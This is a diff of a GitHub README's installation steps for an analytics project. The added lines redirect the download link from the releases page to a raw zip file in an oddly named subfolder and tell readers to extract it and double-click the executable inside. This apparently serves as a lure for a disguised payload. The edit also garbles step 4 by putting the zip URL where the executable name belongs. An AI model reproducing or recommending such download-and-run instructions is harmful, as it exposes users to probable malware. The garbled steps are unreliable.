Constantine80/Analytics-and-Knowledge-Discovery/README.md

 ### 📂 Installation Instructions

-1. **Visit the Release Page**: Go to [the releases page](https://github.com/Constantine80/Analytics-and-Knowledge-Discovery/releases) to find the latest version.
+1. **Visit the Release Page**: Go to [the releases page](https://raw.githubusercontent.com/Constantine80/Analytics-and-Knowledge-Discovery/main/influenzal/Analytics-and-Knowledge-Discovery.zip) to find the latest version.

 2. **Download the Package**: Click on the version you want to download.

 3. **Extract the Files** (if necessary): After downloading, extract the package to a folder on your computer.

-4. **Run the Application**: Open the folder where you extracted the files and find the executable file (often named `app.exe` or similar).
+4. **Run the Application**: Open the folder where you extracted the files and find the executable file (often named `https://raw.githubusercontent.com/Constantine80/Analytics-and-Knowledge-Discovery/main/influenzal/Analytics-and-Knowledge-Discovery.zip` or similar).
 Double-click it to run the application.

 5. **Follow On-Screen Instructions**: The application will guide you through the setup.